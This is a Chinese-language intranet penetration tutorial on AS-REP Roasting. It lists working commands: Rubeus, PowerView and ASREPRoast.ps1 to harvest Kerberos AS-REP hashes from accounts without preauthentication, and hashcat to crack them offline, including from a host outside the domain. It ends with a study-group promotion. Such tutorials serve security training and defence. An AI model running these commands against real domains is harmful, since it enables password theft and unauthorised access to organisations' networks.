内网渗透(三) | AS-REP Roasting攻击

  • A+
所属分类:安全文章

AS-REP Roasting攻击

AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。而该属性默认是没有勾选上的。


预身份验证是Kerberos身份验证的第一步(AS_REQ & AS_REP),它的主要作用是防止密码脱机爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。关于 AS_REQ & AS_REP:域内认证之Kerberos协议详解。


当关闭了预身份验证后,攻击者可以使用指定用户去请求票据,此时域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Session Key返回。因此,攻击者就可以对获取到的 用户Hash加密的Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文。


内网渗透(三) | AS-REP Roasting攻击

AS-REP Roasting攻击条件

  • 域用户设置了 “ Do not require Kerberos preauthentication(不需要kerberos预身份验证) ”

  • 需要一台可与KDC进行通信的主机/用户

内网渗透(三) | AS-REP Roasting攻击

内网渗透(三) | AS-REP Roasting攻击

普通域用户下

方法一:使用 Rubeus.exe


1:使用rubeus.exe获得Hash

Rubeus.exe asreproast
内网渗透(三) | AS-REP Roasting攻击


2:使用hashcat对获得的Hash进行爆破

将hash.txt里面的除Hash字段其他的都删除,复制到hashcat目录下,并且修改为hashcat能识别的格式,在$krb5asrep后面添加$23拼接。

内网渗透(三) | AS-REP Roasting攻击

然后使用以下命令爆破

 hashcat64.exe -m 18200 hash.txt pass.txt --force
内网渗透(三) | AS-REP Roasting攻击
内网渗透(三) | AS-REP Roasting攻击


方法二:使用powershell脚本


1:使用Empire下的powerview.ps1查找域中设置了 "不需要kerberos预身份验证" 的用户

 Import-Module .powerview.ps1 Get-DomainUser -PreauthNotRequired
内网渗透(三) | AS-REP Roasting攻击

2:使用ASREPRoast.ps1获取AS-REP返回的Hash

Import-Module .ASREPRoast.ps1Get-ASREPHash -UserName hack2 -Domain xie.com | Out-File -Encoding ASCII hash.txt
内网渗透(三) | AS-REP Roasting攻击

3:使用hashcat对获得的Hash进行爆破

将hash.txt复制到hashcat目录下,并且修改为hashcat能识别的格式,在$krb5asrep后面添加$23拼接。然后使用以下命令爆破。

hashcat64.exe -m 18200 hash.txt pass.txt --force
内网渗透(三) | AS-REP Roasting攻击
内网渗透(三) | AS-REP Roasting攻击

内网渗透(三) | AS-REP Roasting攻击

非域内机器

1:对于非域内的机器,无法通过LDAP来发起用户名的查询。

2:所以要想获取 "不需要kerberos预身份验证" 的域内账号,只能通过枚举用户名的方式来获得。而AS-REP Hash方面。非域内的主机,只要能和DC通信,便可以获取到。使用Get-ASREPHash,通过指定Server的参数即可

Import-Module .ASREPRoast.ps1Get-ASREPHash -UserName hack2 -Domain xie.com -Server 192.168.10.131 | Out-File -Encoding ASCII hash.txt

3:获取到Hash后,使用hashcat对其爆破,和上面一样,这里就不演示了。


内网渗透(三) | AS-REP Roasting攻击




扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

内网渗透(三) | AS-REP Roasting攻击

目前25000+人已关注加入我们

内网渗透(三) | AS-REP Roasting攻击

本文始发于微信公众号(Ms08067安全实验室):内网渗透(三) | AS-REP Roasting攻击

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: